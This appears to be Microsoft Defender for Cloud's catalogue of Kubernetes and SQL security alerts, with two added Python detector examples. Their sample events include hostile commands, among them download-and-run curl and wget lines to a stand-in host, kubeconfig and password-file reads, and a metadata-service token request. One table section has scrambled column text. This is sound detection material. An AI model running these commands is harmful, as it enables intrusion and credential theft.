A history file has been cleared (K8S.NODE_HistoryFileCleared) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected that the command history log file has been cleared. Attackers may do this to cover their tracks. The operation was performed by the specified user account.
MITRE tactics: DefenseEvasion
Severity: Medium

Abnormal activity of managed identity associated with Kubernetes (Preview) (K8S_AbnormalMiActivity)
Description: Analysis of Azure Resource Manager operations detected abnormal behavior of a managed identity used by an AKS addon. The detected activity isn't consistent with the behavior of the associated addon. While this activity can be legitimate, such behavior might indicate that the identity was obtained by an attacker, possibly from a compromised container in the Kubernetes cluster.
MITRE tactics: Lateral Movement
Severity: Medium

Abnormal Kubernetes service account operation detected (K8S_ServiceAccountRareOperation)
Description: Kubernetes audit log analysis detected abnormal behavior by a service account in your Kubernetes cluster. The service account was used for an operation that isn't common for this service account. While this activity can be legitimate, such behavior might indicate that the service account is being used for malicious purposes.
MITRE tactics: Lateral Movement, Credential Access
Severity: Medium

An uncommon connection attempt detected (K8S.NODE_SuspectConnection) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected an uncommon connection attempt utilizing a SOCKS protocol. This is very rare in normal operations, but a known technique for attackers attempting to bypass network-layer detections.
MITRE tactics: Execution, Exfiltration, Exploitation
Severity: Medium


Anomalous pod deployment (Preview) (K8S_AnomalousPodDeployment) [2]
Description: Kubernetes audit log analysis detected a pod deployment which is anomalous based on previous pod deployment activity. This activity is considered an anomaly when taking into account how the different features seen in the deployment operation relate to one another. The features monitored include the container image registry used, the account performing the deployment, day of the week, how often this account performs pod deployments, user agent used in the operation, whether this is a namespace to which pod deployments often occur, and other features. The top contributing reasons for raising this alert as anomalous activity are detailed under the alert's extended properties.
MITRE tactics: Execution
Severity: Medium

Anomalous secret access (Preview) (K8S_AnomalousSecretAccess) [2]
Description: Kubernetes audit log analysis detected a secret access request which is anomalous based on previous secret access activity. This activity is considered an anomaly when taking into account how the different features seen in the secret access operation relate to one another. The features monitored by this analytic include the user name used, the name of the secret, the name of the namespace, the user agent used in the operation, and other features. The top contributing reasons for raising this alert as anomalous activity are detailed under the alert's extended properties.
MITRE tactics: CredentialAccess
Severity: Medium

Attempt to stop apt-daily-upgrade.timer service detected (K8S.NODE_TimerServiceDisabled) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected an attempt to stop the apt-daily-upgrade.timer service. Attackers have been observed stopping this service to download malicious files and grant execution privileges for their attacks. This activity can also happen if the service is updated through normal administrative actions.
MITRE tactics: DefenseEvasion
Severity: Informational

Behavior similar to common Linux bots detected (Preview) (K8S.NODE_CommonBot)
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected the execution of a process normally associated with common Linux botnets.
MITRE tactics: Execution, Collection, Command And Control
Severity: Medium


Behavior similar to Fairware ransomware detected (K8S.NODE_FairwareMalware) [1]
Description: Analysis of processes running within a container detected the execution of rm -rf commands applied to suspicious locations. As rm -rf will recursively delete files, it is normally used on discrete folders. In this case, it is being used in a location that could remove a lot of data. Fairware ransomware is known to execute rm -rf commands in this folder.
MITRE tactics: Execution
Severity: Medium

Command within a container running with high privileges (K8S.NODE_PrivilegedExecutionInContainer) [1]
Description: Machine logs indicate that a privileged command was run in a Docker container. A privileged command has extended privileges on the host machine.
MITRE tactics: PrivilegeEscalation
Severity: Low

Container running in privileged mode (K8S.NODE_PrivilegedContainerArtifacts) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected the execution of a Docker command that is running a privileged container. The privileged container has full access to the hosting pod or host resource. If compromised, an attacker may use the privileged container to gain access to the hosting pod or host.
MITRE tactics: PrivilegeEscalation, Execution
Severity: Low

Container with a sensitive volume mount detected (K8S_SensitiveMount)
Description: Kubernetes audit log analysis detected a new container with a sensitive volume mount. The volume that was detected is a hostPath type which mounts a sensitive file or folder from the node to the container. If the container gets compromised, the attacker can use this mount for gaining access to the node.
MITRE tactics: Privilege Escalation
Severity: Medium

CoreDNS modification in Kubernetes detected (K8S_CoreDnsModification) [2][3]
Description: Kubernetes audit log analysis detected a modification of the CoreDNS configuration. The configuration of CoreDNS can be modified by overriding its configmap. While this activity can be legitimate, if attackers have permissions to modify the configmap, they can change the behavior of the cluster's DNS server and poison it.
MITRE tactics: Lateral Movement
Severity: Low


Creation of admission webhook configuration detected (K8S_AdmissionController) [2]
Description: Kubernetes audit log analysis detected a new admission webhook configuration. Kubernetes has two built-in generic admission controllers: MutatingAdmissionWebhook and ValidatingAdmissionWebhook. The behavior of these admission controllers is determined by an admission webhook that the user deploys to the cluster. The usage of such admission controllers can be legitimate; however, attackers can use such webhooks for modifying the requests (in the case of MutatingAdmissionWebhook) or inspecting the requests and gaining sensitive information (in the case of ValidatingAdmissionWebhook).
MITRE tactics: Credential Access, Persistence
Severity: Low

Detected file download from a known malicious source (K8S.NODE_SuspectDownload) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a download of a file from a source frequently used to distribute malware.
MITRE tactics: PrivilegeEscalation, Execution, Exfiltration, Command And Control
Severity: Medium

Detected suspicious file download (K8S.NODE_SuspectDownloadArtifacts) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a suspicious download of a remote file.
MITRE tactics: Persistence
Severity: Low

Detected suspicious use of the nohup command (K8S.NODE_SuspectNohup) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a suspicious use of the nohup command. Attackers have been seen using the command nohup to run hidden files from a temporary directory to allow their executables to run in the background. It's rare to see this command run on hidden files located in a temporary directory.
MITRE tactics: Persistence, DefenseEvasion
Severity: Medium

Detected suspicious use of the useradd command (K8S.NODE_SuspectUserAddition) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a suspicious use of the useradd command.
MITRE tactics: Persistence
Severity: Medium

Digital currency mining container detected (K8S_MaliciousContainerImage) [3]
Description: Kubernetes audit log analysis detected a container that has an image associated with a digital currency mining tool.
MITRE tactics: Execution
Severity: High

Digital currency mining related behavior detected (K8S.NODE_DigitalCurrencyMining) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected the execution of a process or command normally associated with digital currency mining.
MITRE tactics: Execution
Severity: High


Docker build operation detected on a Kubernetes node (K8S.NODE_ImageBuildOnNode) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a build operation of a container image on a Kubernetes node. While this behavior might be legitimate, attackers might build their malicious images locally to avoid detection.
MITRE tactics: DefenseEvasion
Severity: Low

Excessive role permissions assigned in Kubernetes cluster (Preview) (K8S_ServiceAcountPermissionAnomaly) [3]
Description: Analysis of the Kubernetes audit logs detected an excessive-permissions role assignment to your cluster. The listed permissions for the assigned roles are uncommon for the specific service account. This detection considers previous role assignments to the same service account across clusters monitored by Azure, volume per permission, and the impact of the specific permission. The anomaly detection model used for this alert takes into account how this permission is used across all clusters monitored by Microsoft Defender for Cloud.
MITRE tactics: Privilege Escalation
Severity: Low

Executable found running from a suspicious location (Preview) (K8S.NODE_SuspectExecutablePath)
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected an executable file that is running from a location associated with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised system.
MITRE tactics: Execution
Severity: Medium

Exposed Kubeflow dashboard detected (K8S_ExposedKubeflow)
Description: The Kubernetes audit log analysis detected exposure of the Istio Ingress by a load balancer in a cluster that runs Kubeflow. This action might expose the Kubeflow dashboard to the internet. If the dashboard is exposed to the internet, attackers can access it and run malicious containers or code on the cluster. Find more details in the following article: https://aka.ms/exposedkubeflow-blog
MITRE tactics: Initial Access
Severity: Medium

Exposed Kubernetes dashboard detected (K8S_ExposedDashboard)
Description: Kubernetes audit log analysis detected exposure of the Kubernetes Dashboard by a LoadBalancer service. An exposed dashboard allows unauthenticated access to cluster management and poses a security threat.
MITRE tactics: Initial Access
Severity: High


Exposed Kubernetes service detected (K8S_ExposedService)
Description: The Kubernetes audit log analysis detected exposure of a service by a load balancer. This service is related to a sensitive application that allows high impact operations in the cluster such as running processes on the node or creating new containers. In some cases, this service doesn't require authentication. If the service doesn't require authentication, exposing it to the internet poses a security risk.
MITRE tactics: Initial Access
Severity: Medium

Exposed Redis service in AKS detected (K8S_ExposedRedis)
Description: The Kubernetes audit log analysis detected exposure of a Redis service by a load balancer. If the service doesn't require authentication, exposing it to the internet poses a security risk.
MITRE tactics: Initial Access
Severity: Low

Indicators associated with DDOS toolkit detected (K8S.NODE_KnownLinuxDDoSToolkit) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected file names that are part of a toolkit associated with malware capable of launching DDoS attacks, opening ports and services, and taking full control over the infected system. This could also possibly be legitimate activity.
MITRE tactics: Persistence, LateralMovement, Execution, Exploitation
Severity: Medium

K8S API requests from proxy IP address detected (K8S_TI_Proxy) [2]
Description: Kubernetes audit log analysis detected API requests to your cluster from an IP address that is associated with proxy services, such as TOR. While this behavior can be legitimate, it's often seen in malicious activities, when attackers try to hide their source IP.
MITRE tactics: Execution
Severity: Low

Kubernetes events deleted (K8S_DeleteEvents) [2][3]
Description: Defender for Cloud detected that some Kubernetes events have been deleted. Kubernetes events are objects in Kubernetes that contain information about changes in the cluster. Attackers might delete those events to hide their operations in the cluster.
MITRE tactics: Defense Evasion
Severity: Low

Kubernetes penetration testing tool detected (K8S_PenTestToolsKubeHunter)
Description: Kubernetes audit log analysis detected usage of a Kubernetes penetration testing tool in the AKS cluster. While this behavior can be legitimate, attackers might use such public tools for malicious purposes.
MITRE tactics: Execution
Severity: Low

Manipulation of host firewall detected (K8S.NODE_FirewallDisabled)
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a possible manipulation of the on-host firewall. Attackers will often disable this to exfiltrate data.
MITRE tactics: DefenseEvasion, Exfiltration
Severity: Medium


Microsoft Defender for Cloud test alert (not a threat). (K8S.NODE_EICAR) [1]
Description: This is a test alert generated by Microsoft Defender for Cloud. No further action is needed.
MITRE tactics: Execution
Severity: High

New container in the kube-system namespace detected (K8S_KubeSystemContainer) [2]
Description: Kubernetes audit log analysis detected a new container in the kube-system namespace that isn't among the containers that normally run in this namespace. The kube-system namespace shouldn't contain user resources. Attackers can use this namespace for hiding malicious components.
MITRE tactics: Persistence
Severity: Low

New high privileges role detected (K8S_HighPrivilegesRole) [2]
Description: Kubernetes audit log analysis detected a new role with high privileges. A binding to a role with high privileges gives the user\group high privileges in the cluster. Unnecessary privileges might cause privilege escalation in the cluster.
MITRE tactics: Persistence
Severity: Low

Possible attack tool detected (K8S.NODE_KnownLinuxAttackTool) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a suspicious tool invocation. This tool is often associated with malicious users attacking others.
MITRE tactics: Execution, Collection, Command And Control, Probing
Severity: Medium

Possible backdoor detected (K8S.NODE_LinuxBackdoorArtifact) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a suspicious file being downloaded and run. This activity has previously been associated with installation of a backdoor.
MITRE tactics: Persistence, DefenseEvasion, Execution, Exploitation
Severity: Medium

Possible command line exploitation attempt (K8S.NODE_ExploitAttempt) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a possible exploitation attempt against a known vulnerability.
MITRE tactics: Exploitation
Severity: Medium

Possible credential access tool detected (K8S.NODE_KnownLinuxCredentialAccessTool) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a possible known credential access tool running on the container, as identified by the specified process and command-line history item. This tool is often associated with attacker attempts to access credentials.
MITRE tactics: CredentialAccess
Severity: Medium

Possible Cryptocoinminer download detected (K8S.NODE_CryptoCoinMinerDownload) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected download of a file normally associated with digital currency mining.
MITRE tactics: DefenseEvasion, Command And Control, Exploitation
Severity: Medium


Possible data exfiltration detected (K8S.NODE_DataEgressArtifacts) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a possible data egress condition. Attackers will often egress data from machines they have compromised.
MITRE tactics: Collection, Exfiltration
Severity: Medium

Possible Log Tampering Activity Detected (K8S.NODE_SystemLogRemoval) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a possible removal of files that track user activity during the course of its operation. Attackers often try to evade detection and leave no trace of malicious activities by deleting such log files.
MITRE tactics: DefenseEvasion
Severity: Medium

Possible password change using crypt-method detected (K8S.NODE_SuspectPasswordChange) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a password change using the crypt method. Attackers can make this change to continue access and gain persistence after compromise.
MITRE tactics: CredentialAccess
Severity: Medium

Potential port forwarding to external IP address (K8S.NODE_SuspectPortForwarding) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected an initiation of port forwarding to an external IP address.
MITRE tactics: Exfiltration, Command And Control
Severity: Medium

Potential reverse shell detected (K8S.NODE_ReverseShell) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a potential reverse shell. These are used to get a compromised machine to call back into a machine an attacker owns.
MITRE tactics: Exfiltration, Exploitation
Severity: Medium

Privileged container detected (K8S_PrivilegedContainer)
Description: Kubernetes audit log analysis detected a new privileged container. A privileged container has access to the node's resources and breaks the isolation between containers. If compromised, an attacker can use the privileged container to gain access to the node.
MITRE tactics: Privilege Escalation
Severity: Low

Process associated with digital currency mining detected (K8S.NODE_CryptoCoinMinerArtifacts) [1]
Description: Analysis of processes running within a container detected the execution of a process normally associated with digital currency mining.
MITRE tactics: Execution, Exploitation
Severity: Medium

Process seen accessing the SSH authorized keys file in an unusual way (K8S.NODE_SshKeyAccess) [1]
Description: An SSH authorized_keys file was accessed in a method similar to known malware campaigns. This access could signify that an actor is attempting to gain persistent access to a machine.
MITRE tactics: Unknown
Severity: Low


Role binding to the cluster-admin role detected (K8S_ClusterAdminBinding)
Description: Kubernetes audit log analysis detected a new binding to the cluster-admin role, which gives administrator privileges. Unnecessary administrator privileges might cause privilege escalation in the cluster.
MITRE tactics: Persistence
Severity: Low

Security-related process termination detected (K8S.NODE_SuspectProcessTermination) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected an attempt to terminate processes related to security monitoring on the container. Attackers will often try to terminate such processes using predefined scripts post-compromise.
MITRE tactics: Persistence
Severity: Low

SSH server is running inside a container (K8S.NODE_ContainerSSH) [1]
Description: Analysis of processes running within a container detected an SSH server running inside the container.
MITRE tactics: Execution
Severity: Medium

Suspicious file timestamp modification (K8S.NODE_TimestampTampering) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a suspicious timestamp modification. Attackers will often copy timestamps from existing legitimate files to new tools to avoid detection of these newly dropped files.
MITRE tactics: Persistence, DefenseEvasion
Severity: Low

Suspicious request to Kubernetes API (K8S.NODE_KubernetesAPI) [1]
Description: Analysis of processes running within a container indicates that a suspicious request was made to the Kubernetes API. The request was sent from a container in the cluster. Although this behavior can be intentional, it might indicate that a compromised container is running in the cluster.
MITRE tactics: LateralMovement
Severity: Medium

Suspicious request to the Kubernetes Dashboard (K8S.NODE_KubernetesDashboard) [1]
Description: Analysis of processes running within a container indicates that a suspicious request was made to the Kubernetes Dashboard. The request was sent from a container in the cluster. Although this behavior can be intentional, it might indicate that a compromised container is running in the cluster.
MITRE tactics: LateralMovement
Severity: Medium

Potential crypto coin miner started (K8S.NODE_CryptoCoinMinerExecution) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a process being started in a way normally associated with digital currency mining.
MITRE tactics: Execution
Severity: Medium

Suspicious password access (K8S.NODE_SuspectPasswordFileAccess) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a suspicious attempt to access encrypted user passwords.
MITRE tactics: Persistence
Severity: Informational
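Several of the K8S_ alerts above (privileged container, sensitive hostPath mount, new container in kube-system, exposed dashboard, cluster-admin binding, admission webhook creation, deleted events) are described as "Kubernetes audit log analysis". The block below is an added example, not Defender for Cloud's analysis code, showing what those checks look like when run over standard Kubernetes audit events written at RequestResponse level (so `requestObject` is present). The audit lines are constructed, and the sensitive-path list and the kube-system image baseline are assumptions; Defender's own baselines are not public.

```python
"""Added example (not Defender's analysis code): checks over Kubernetes audit
events for the control-plane (K8S_) conditions the tables describe. The audit
format follows the standard Kubernetes audit Event; the baselines are assumed."""
import json

# Assumed baselines; Defender's are not public.
SENSITIVE_HOST_PATHS = ["/etc", "/var/run/docker.sock", "/var/lib/kubelet",
                        "/proc", "/root", "/etc/kubernetes", "/var/run/crio"]
KUBE_SYSTEM_BASELINE = {"registry.k8s.io/coredns/coredns", "registry.k8s.io/kube-proxy"}

# Constructed audit log (JSON lines, RequestResponse level so requestObject is present).
AUDIT_LOG = """\
{"kind":"Event","verb":"create","user":{"username":"system:serviceaccount:default:ci"},"objectRef":{"resource":"pods","namespace":"default","name":"dbg"},"requestObject":{"spec":{"containers":[{"name":"shell","image":"docker.io/library/alpine:3.18","securityContext":{"privileged":true}}],"volumes":[{"name":"sock","hostPath":{"path":"/var/run/docker.sock"}}]}}}
{"kind":"Event","verb":"create","user":{"username":"dev"},"objectRef":{"resource":"pods","namespace":"default","name":"web"},"requestObject":{"spec":{"containers":[{"name":"web","image":"docker.io/library/nginx:1.25"}],"volumes":[{"name":"data","hostPath":{"path":"/data/web"}}]}}}
{"kind":"Event","verb":"create","user":{"username":"dev"},"objectRef":{"resource":"pods","namespace":"kube-system","name":"metrics-helper"},"requestObject":{"spec":{"containers":[{"name":"m","image":"docker.io/someuser/xmrig:latest"}]}}}
{"kind":"Event","verb":"create","user":{"username":"admin"},"objectRef":{"resource":"services","namespace":"kubernetes-dashboard","name":"kubernetes-dashboard"},"requestObject":{"metadata":{"labels":{"k8s-app":"kubernetes-dashboard"}},"spec":{"type":"LoadBalancer","ports":[{"port":443}]}}}
{"kind":"Event","verb":"create","user":{"username":"admin"},"objectRef":{"resource":"clusterrolebindings","name":"ci-admin"},"requestObject":{"roleRef":{"kind":"ClusterRole","name":"cluster-admin"},"subjects":[{"kind":"ServiceAccount","name":"ci","namespace":"default"}]}}
{"kind":"Event","verb":"create","user":{"username":"admin"},"objectRef":{"resource":"mutatingwebhookconfigurations","name":"inject-sidecar"},"requestObject":{"webhooks":[{"name":"inject.example"}]}}
{"kind":"Event","verb":"deletecollection","user":{"username":"system:serviceaccount:default:ci"},"objectRef":{"resource":"events","namespace":"default"}}
"""


def sensitive_hostpath(path):
    """True for '/' or anything at or under an assumed sensitive host path."""
    p = path.rstrip("/") or "/"
    return p == "/" or any(p == s or p.startswith(s + "/") for s in SENSITIVE_HOST_PATHS)


def analyze(audit_text):
    """Return (alert name as on the page, detail) for each condition found."""
    findings = []
    for line in audit_text.splitlines():
        ev = json.loads(line)
        ref, verb = ev.get("objectRef", {}), ev.get("verb")
        res, ns, name = ref.get("resource"), ref.get("namespace", ""), ref.get("name", "")
        obj, who = ev.get("requestObject", {}), ev.get("user", {}).get("username", "?")
        if verb == "create" and res == "pods":
            spec = obj.get("spec", {})
            for c in spec.get("containers", []):
                if c.get("securityContext", {}).get("privileged"):
                    findings.append(("Privileged container detected", f"{ns}/{name}:{c['name']}"))
                image = c.get("image", "").rsplit(":", 1)[0]  # drop the tag (digests/registry ports not handled)
                if ns == "kube-system" and image not in KUBE_SYSTEM_BASELINE:
                    findings.append(("New container in the kube-system namespace detected", f"{name}:{image}"))
            for v in spec.get("volumes", []):
                hp = v.get("hostPath", {}).get("path")
                if hp and sensitive_hostpath(hp):
                    findings.append(("Container with a sensitive volume mount detected", f"{ns}/{name}:{hp}"))
        elif verb == "create" and res == "services":
            labels = obj.get("metadata", {}).get("labels", {})
            if obj.get("spec", {}).get("type") == "LoadBalancer" and (
                    "dashboard" in name or labels.get("k8s-app") == "kubernetes-dashboard"):
                findings.append(("Exposed Kubernetes dashboard detected", f"{ns}/{name}"))
        elif verb == "create" and res == "clusterrolebindings":
            if obj.get("roleRef", {}).get("name") == "cluster-admin":
                subjects = ",".join(s.get("name", "?") for s in obj.get("subjects", []))
                findings.append(("Role binding to the cluster-admin role detected", f"{name} -> {subjects} by {who}"))
        elif verb == "create" and res in ("mutatingwebhookconfigurations", "validatingwebhookconfigurations"):
            findings.append(("Creation of admission webhook configuration detected", f"{res}/{name} by {who}"))
        elif verb in ("delete", "deletecollection") and res == "events":
            findings.append(("Kubernetes events deleted", f"namespace={ns or '*'} by {who}"))
    return findings


if __name__ == "__main__":
    for alert, detail in analyze(AUDIT_LOG):
        print(f"{alert}: {detail}")
```

The benign `web` pod (unprivileged, hostPath under `/data`) produces nothing, which is the point of keeping a sensitive-path list rather than flagging every hostPath; everything else in the constructed log maps to one alert name from the tables.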


Suspicious use of DNS over HTTPS (K8S.NODE_SuspiciousDNSOverHttps) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected the use of a DNS call over HTTPS in an uncommon fashion. This technique is used by attackers to hide calls out to suspect or malicious sites.
MITRE tactics: DefenseEvasion, Exfiltration
Severity: Medium

A possible connection to malicious location has been detected. (K8S.NODE_ThreatIntelCommandLineSuspectDomain)
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a connection to a location that has been reported to be malicious or unusual. This is an indicator that a compromise may have occurred.
MITRE tactics: InitialAccess
Severity: Medium

Possible malicious web shell detected. (K8S.NODE_Webshell) [1]
Description: Analysis of processes running within a container detected a possible web shell. Attackers will often upload a web shell to a compute resource they have compromised to gain persistence or for further exploitation.
MITRE tactics: Persistence, Exploitation
Severity: Medium

Burst of multiple reconnaissance commands could indicate initial activity after compromise (K8S.NODE_ReconnaissanceArtifactsBurst) [1]
Description: Analysis of host/device data detected execution of multiple reconnaissance commands related to gathering system or host details, performed by attackers after initial compromise.
MITRE tactics: Discovery, Collection
Severity: Low

Suspicious Download Then Run Activity (K8S.NODE_DownloadAndRunCombo) [1]
Description: Analysis of processes running within a container or directly on a Kubernetes node has detected a file being downloaded then run in the same command. While this isn't always malicious, this is a very common technique attackers use to get malicious files onto victim machines.
MITRE tactics: Execution, CommandAndControl, Exploitation
Severity: Medium

Digital currency mining activity (K8S.NODE_CurrencyMining) [1]
Description: Analysis of DNS transactions detected digital currency mining activity. Such activity, while possibly legitimate user behavior, is frequently performed by attackers following compromise of resources. Typical related attacker activity is likely to include the download and execution of common mining tools.
MITRE tactics: Exfiltration
Severity: Low

Access to kubelet kubeconfig file detected (K8S.NODE_KubeConfigAccess) [1]
Description: Analysis of processes running on a Kubernetes cluster node detected access to the kubeconfig file on the host. The kubeconfig file, normally used by the Kubelet process, contains credentials to the Kubernetes cluster API server. Access to this file is often associated with attackers attempting to access those credentials, or with security scanning tools which check if the file is accessible.
MITRE tactics: CredentialAccess
Severity: Medium


Alert (alert type) 


Access to cloud metadata service detected 
(K8S.NODE_ImdsCall) ! 


MITRE Caldera agent detected 
(K8S.NODE_MitreCalderaTools) ! 


MITRE tactics 
(Learn more) 


Description 


Analysis of processes running within CredentialAccess 
a container detected access to the 

cloud metadata service for acquiring 

identity token. The container doesn't 

normally perform such operation. 

While this behavior might be 

legitimate, attackers might use this 

technique to access cloud resources 

after gaining initial access to a 


running container. 


Analysis of processes running within Persistence, 


a container or directly ona PrivilegeEscalation, 
Kubernetes node, has detected a DefenseEvasion, 
suspicious process. This is often CredentialAccess, 
associated with the MITRE 54ndc47 


agent which could be used 


Discovery, 
LateralMovement, 
maliciously to attack other machines. Execution, Collection, 
Exfiltration, Command 
And Control, Probing, 


Exploitation 


1: Preview for non-AKS clusters: This alert is generally available for AKS clusters, but it is in preview for other 


environments, such as Azure Arc, EKS and GKE. 


Severity 


Medium 


Medium 


2: Limitations on GKE clusters: GKE uses a Kubernetes audit policy that doesn't support all alert types. As a result, this 


security alert, which is based on Kubernetes audit events, is not supported for GKE clusters. 


3: This alert is supported on Windows nodes/containers. 
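To make the node-level alerts above concrete, here is an added example (it is not Defender for Cloud's detector and not code from this page) that applies simple pattern rules mirroring five of the K8S.NODE_* alert types to process command lines captured on a node. The regular expressions, the kubeconfig paths, the reconnaissance threshold of three commands, the sample events and the container names are all assumptions; the tactic and severity labels are the ones the table lists for each alert type.

```python
"""Toy node-level command-line detector mirroring a few K8S.NODE_* alert types.
Added example; not Defender for Cloud's logic. All sample events are constructed."""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Alert:
    container: str
    name: str
    tactics: tuple
    severity: str


# (alert type, pattern, tactics, severity). Tactics/severity come from the table above;
# the patterns are assumptions made for this example.
RULES = [
    ("K8S.NODE_DownloadAndRunCombo",
     # downloader piped into a shell, or chained (&&/;) with chmod +x, a shell, or a /tmp binary
     re.compile(r"\b(?:curl|wget)\b.*?(?:\|\s*(?:ba)?sh\b|(?:&&|;)\s*(?:chmod\s+\+x|bash\b|sh\b|\./|/tmp/))"),
     ("Execution", "CommandAndControl", "Exploitation"), "Medium"),
    ("K8S.NODE_KubeConfigAccess",
     re.compile(r"/var/lib/kubelet/kubeconfig|/etc/kubernetes/kubelet\.conf"),  # assumed common paths
     ("CredentialAccess",), "Medium"),
    ("K8S.NODE_ImdsCall",
     re.compile(r"169\.254\.169\.254/.*?/identity/oauth2/token"),  # Azure IMDS token endpoint
     ("CredentialAccess",), "Medium"),
    ("K8S.NODE_SuspiciousDNSOverHttps",
     re.compile(r"https://\S*/dns-query|application/dns-(?:json|message)"),
     ("DefenseEvasion", "Exfiltration"), "Medium"),
]
RECON_CMD = re.compile(r"^(?:whoami|id|uname|hostname|ip\s+a|ifconfig|cat\s+/etc/passwd|env|ps)\b")
RECON_BURST_THRESHOLD = 3  # assumed; the page gives no number


def scan(events):
    """events: iterable of (container, command_line). Returns a list of Alert."""
    alerts, recon_hits = [], Counter()
    for container, cmd in events:
        for name, pattern, tactics, severity in RULES:
            if pattern.search(cmd):
                alerts.append(Alert(container, name, tactics, severity))
        if RECON_CMD.match(cmd.strip()):
            recon_hits[container] += 1
    # a burst of reconnaissance commands from one container is itself an alert
    for container, n in recon_hits.items():
        if n >= RECON_BURST_THRESHOLD:
            alerts.append(Alert(container, "K8S.NODE_ReconnaissanceArtifactsBurst",
                                ("Discovery", "Collection"), "Low"))
    return alerts


# Constructed sample events: (container, command line). Hosts use documentation ranges.
SAMPLE_EVENTS = [
    ("web-7f9c", "curl -s http://203.0.113.10/x.sh | sh"),
    ("web-7f9c", "wget -q http://203.0.113.10/m -O /tmp/m && chmod +x /tmp/m && /tmp/m"),
    ("batch-1", "cat /var/lib/kubelet/kubeconfig"),
    ("batch-1", "curl -H 'Metadata: true' 'http://169.254.169.254/metadata/identity/oauth2/token"
                "?api-version=2018-02-01&resource=https://management.azure.com/'"),
    ("dns-1", "curl -s -H 'accept: application/dns-json' 'https://doh.example/dns-query?name=example.com'"),
    ("shell-9", "whoami"),
    ("shell-9", "uname -a"),
    ("shell-9", "cat /etc/passwd"),
    ("shell-9", "ip a"),
    ("app-3", "ls -la /tmp"),
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a.severity:<7} {a.container:<9} {a.name}  tactics={','.join(a.tactics)}")
```

The benign `ls` in `app-3` produces nothing, and the IMDS and DNS-over-HTTPS lines, although they use `curl`, do not match the download-and-run rule because nothing is executed afterwards; a real sensor works on process trees and network data rather than on command-line text alone, which is why the page's alerts can separate "downloaded then run in the same command" from an ordinary fetch.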


Alerts for SQL Database and Azure Synapse Analytics 


Further details and notes 


Alert (alert type) | Description | MITRE tactics (Learn more) | Severity

A possible vulnerability to SQL Injection (SQL.DB_VulnerabilityToSqlInjection, SQL.VM_VulnerabilityToSqlInjection, SQL.MI_VulnerabilityToSqlInjection, SQL.DW_VulnerabilityToSqlInjection, Synapse.SQLPool_VulnerabilityToSqlInjection)
Description: An application has generated a faulty SQL statement in the database. This can indicate a possible vulnerability to SQL injection attacks. There are two possible reasons for a faulty statement. A defect in application code might have constructed the faulty SQL statement. Or, application code or stored procedures didn't sanitize user input when constructing the faulty SQL statement, which can be exploited for SQL injection.
MITRE tactics: PreAttack
Severity: Medium

Attempted logon by a potentially harmful application (SQL.DB_HarmfulApplication, SQL.VM_HarmfulApplication, SQL.MI_HarmfulApplication, SQL.DW_HarmfulApplication, Synapse.SQLPool_HarmfulApplication)
Description: A potentially harmful application attempted to access your resource.
MITRE tactics: PreAttack
Severity: High


Log on from an unusual Azure Data Center (SQL.DB_DataCenterAnomaly, SQL.VM_DataCenterAnomaly, SQL.DW_DataCenterAnomaly, SQL.MI_DataCenterAnomaly, Synapse.SQLPool_DataCenterAnomaly)
Description: There has been a change in the access pattern to an SQL Server, where someone has signed in to the server from an unusual Azure Data Center. In some cases, the alert detects a legitimate action (a new application or Azure service). In other cases, the alert detects a malicious action (an attacker operating from a breached resource in Azure).
MITRE tactics: Probing
Severity: Low

Log on from an unusual location (SQL.DB_GeoAnomaly, SQL.VM_GeoAnomaly, SQL.DW_GeoAnomaly, SQL.MI_GeoAnomaly, Synapse.SQLPool_GeoAnomaly)
Description: There has been a change in the access pattern to an SQL Server, where someone has signed in to the server from an unusual geographical location. In some cases, the alert detects a legitimate action (a new application or developer maintenance). In other cases, the alert detects a malicious action (a former employee or an external attacker).
MITRE tactics: Exploitation
Severity: Medium

Login from a principal user not seen in 60 days (SQL.DB_PrincipalAnomaly, SQL.VM_PrincipalAnomaly, SQL.DW_PrincipalAnomaly, SQL.MI_PrincipalAnomaly, Synapse.SQLPool_PrincipalAnomaly)
Description: A principal user not seen in the last 60 days has logged into your database. If this database is new or this is expected behavior caused by recent changes in the users accessing the database, Defender for Cloud will identify significant changes to the access patterns and attempt to prevent future false positives.
MITRE tactics: Exploitation
Severity: Medium

Login from a domain not seen in 60 days (SQL.DB_DomainAnomaly, SQL.VM_DomainAnomaly, SQL.DW_DomainAnomaly, SQL.MI_DomainAnomaly, Synapse.SQLPool_DomainAnomaly)
Description: A user has logged in to your resource from a domain no other users have connected from in the last 60 days. If this resource is new or this is expected behavior caused by recent changes in the users accessing the resource, Defender for Cloud will identify significant changes to the access patterns and attempt to prevent future false positives.
MITRE tactics: Exploitation
